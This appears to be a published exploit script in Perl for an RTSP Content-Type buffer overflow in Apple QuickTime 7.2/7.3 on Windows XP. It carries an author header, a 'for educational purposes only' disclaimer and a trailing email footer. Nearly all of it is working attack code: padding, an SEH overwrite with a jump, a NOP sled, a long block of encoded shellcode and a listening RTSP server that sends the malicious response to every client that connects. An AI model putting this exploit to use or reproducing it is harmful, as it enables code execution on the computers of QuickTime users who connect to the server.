# Exploit Title: Apple QuickTime 7.2/7.3 RTSP BOF (Perl) # Date: 2009-01-06 # Author: Jacky # Software Link: [downoad link if available] # Version: 7.2/7.3 # Tested on: Windows XP SP3 # CVE : [if exists] # Code : #Apple QuickTime 7.2/7.3 RTSP BOF (Perl Edition ) #Discovered by (Krystian Kloskowski (h07) ) #Written and coded by Jacky! #All Greetz to Peter Van Eeckhoutte and Corelan Team ( Best exploitation team);-) #This time i wrote the exploit in perl , because i saw that it was written #many times in python and ruby only ! #This exploit is for EDUCATIONAL PURPOSES ONLY !!! #!/usr/bin/perl -w # (RTSP) Content-Type: [A * 995] + [B * 4096]\r\n # # 0x41414141 Pointer to next SEH record # 0x42424242 SE handler use strict; use Socket; my $junk="A"x991; my $nseh="\xeb\x06\x90\x90"; my $seh="\x4e\x28\x86\x66"; #\x4e\x28\x86\x66 my $nops="\x90"x20; my $shellcode="\x89\xe2\xdd\xc4\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" . "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" . "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" . "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" . "\x42\x75\x4a\x49\x4b\x4c\x48\x68\x4f\x79\x43\x30\x43\x30" . "\x47\x70\x45\x30\x4b\x39\x4d\x35\x50\x31\x49\x42\x45\x34" . "\x4e\x6b\x46\x32\x44\x70\x4c\x4b\x50\x52\x44\x4c\x4c\x4b" . "\x42\x72\x45\x44\x4c\x4b\x50\x72\x51\x38\x44\x4f\x4f\x47" . "\x50\x4a\x47\x56\x46\x51\x49\x6f\x45\x61\x4b\x70\x4c\x6c" . "\x45\x6c\x43\x51\x51\x6c\x47\x72\x46\x4c\x47\x50\x4f\x31" . "\x4a\x6f\x44\x4d\x46\x61\x49\x57\x4a\x42\x48\x70\x46\x32" . "\x46\x37\x4e\x6b\x50\x52\x46\x70\x4c\x4b\x47\x32\x47\x4c" . "\x45\x51\x4e\x30\x4e\x6b\x51\x50\x44\x38\x4b\x35\x4b\x70" . "\x43\x44\x43\x7a\x46\x61\x4e\x30\x46\x30\x4e\x6b\x50\x48" . "\x46\x78\x4c\x4b\x51\x48\x47\x50\x46\x61\x49\x43\x4b\x53" . "\x47\x4c\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x46\x61\x48\x56" . "\x50\x31\x49\x6f\x50\x31\x49\x50\x4e\x4c\x4f\x31\x48\x4f" . "\x44\x4d\x47\x71\x48\x47\x46\x58\x4b\x50\x44\x35\x49\x64" . "\x44\x43\x51\x6d\x4a\x58\x47\x4b\x43\x4d\x44\x64\x50\x75" . "\x4a\x42\x50\x58\x4e\x6b\x42\x78\x47\x54\x46\x61\x4b\x63" . "\x43\x56\x4e\x6b\x44\x4c\x42\x6b\x4c\x4b\x42\x78\x45\x4c" . "\x45\x51\x49\x43\x4e\x6b\x44\x44\x4c\x4b\x47\x71\x4e\x30" . "\x4c\x49\x43\x74\x44\x64\x44\x64\x43\x6b\x51\x4b\x51\x71" . "\x43\x69\x43\x6a\x43\x61\x4b\x4f\x49\x70\x42\x78\x43\x6f" . "\x42\x7a\x4e\x6b\x45\x42\x4a\x4b\x4f\x76\x51\x4d\x51\x7a" . "\x45\x51\x4e\x6d\x4b\x35\x4d\x69\x43\x30\x47\x70\x47\x70" . "\x50\x50\x45\x38\x45\x61\x4c\x4b\x42\x4f\x4e\x67\x4b\x4f" . "\x49\x45\x4d\x6b\x49\x6e\x44\x4e\x44\x72\x4b\x5a\x45\x38" . "\x4f\x56\x4f\x65\x4d\x6d\x4f\x6d\x49\x6f\x4a\x75\x45\x6c" . "\x47\x76\x43\x4c\x46\x6a\x4d\x50\x49\x6b\x49\x70\x44\x35" . "\x44\x45\x4f\x4b\x51\x57\x47\x63\x50\x72\x50\x6f\x42\x4a" . "\x43\x30\x46\x33\x4b\x4f\x48\x55\x45\x33\x51\x71\x42\x4c" . "\x42\x43\x44\x6e\x42\x45\x44\x38\x43\x55\x45\x50\x41\x41"; my $rest="B"x(4096-length($seh.$nops.$shellcode)); my $payload=$junk.$nseh.$seh.$nops.$shellcode.$rest; my $header = "RTSP/1.0 200 OK\r\n". "CSeq: 1\r\n". "Date: 0x00 :P\r\n". "Content-Base: rtsp://0.0.0.0/1.mp3/\r\n". "Content-Type: $payload\r\n". "Content-Length: 334\r\n". "\r\n"; my $body = "v=0\r\n". "o=- 16689332712 1 IN IP4 0.0.0.0\r\n". "s=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n". "i=1.mp3\r\n". "t=0 0\r\n". "a=tool:ciamciaramcia\r\n". "a=type:broadcast\r\n". "a=control:*\r\n". "a=range:npt=0-213.077\r\n". "a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n". "a=x-qt-text-inf:1.mp3\r\n". "m=audio 0 RTP/AVP 14\r\n". "c=IN IP4 0.0.0.0\r\n". "a=control:track1\r\n"; my $evil=$header.$body; my $port=shift || 554; my $proto=getprotobyname('tcp'); socket(SERVER,PF_INET,SOCK_STREAM,$proto); my $paddr=sockaddr_in($port,INADDR_ANY); bind(SERVER,$paddr); listen(SERVER,SOMAXCONN); print "[+]Listening on [RTSP]554\n"; my $client_addr; while($client_addr=accept(CLIENT,SERVER)) { print CLIENT $evil; print "[+]Connection Accepted\n"; print "[+]Sending Evil Payload\n"; } close CLIENT; print "[+]Connection closed\n"; ________________________________ Windows Live: Friends get your Flickr, Yelp, and Digg updates when they e-mail you.